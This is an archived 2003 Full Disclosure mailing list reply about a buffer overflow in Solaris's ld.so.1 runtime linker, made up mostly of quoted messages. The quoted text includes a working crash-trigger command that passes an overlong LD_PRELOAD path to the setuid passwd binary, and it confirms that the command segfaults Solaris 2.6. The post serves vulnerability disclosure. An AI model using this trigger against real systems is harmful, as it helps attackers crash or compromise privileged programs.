Full Disclosure mailing list archives

Re: Fwd: Re: Solaris ld.so.1 buffer overflow

From: Jim Dew <jdew () yggdrasil ca>
Date: Wed, 30 Jul 2003 21:18:39 -0400

On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:


On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:

Modify the command (you need to add a trailing slash) to be the following:

LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd

and try it again.


this segfaults on solaris 2.6


That's right, my original message had a typo, the trailing slash was 
missing. Thanks for noticing this, David. Without the slash nothing 
special happens. My apologies,



-- 
Jouko Pynnonen          http://iki.fi/jouko/
jouko () iki fi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


-- 
"Most moms teach their daughters how to run a house, but you?  You teach
yours the fine art of mass destruction."
      - Nabs - Goodbye is not forever

perl -le '$_="6110>374086;2064208213:90<307;55";tr[0->][ LEOR!AUBGNSTY];print'
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Solaris ld.so.1 buffer overflow Jouko Pynnonen (Jul 29)
- <Possible follow-ups>
- Fwd: Re: Solaris ld.so.1 buffer overflow Jouko Pynnonen (Jul 30)
  - Alleged Foundstone anonymous astroturf memo Richard Johnson (Jul 30)
  - Re: Fwd: Re: Solaris ld.so.1 buffer overflow Jim Dew (Jul 30)
- RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow Schmehl, Paul L (Jul 31)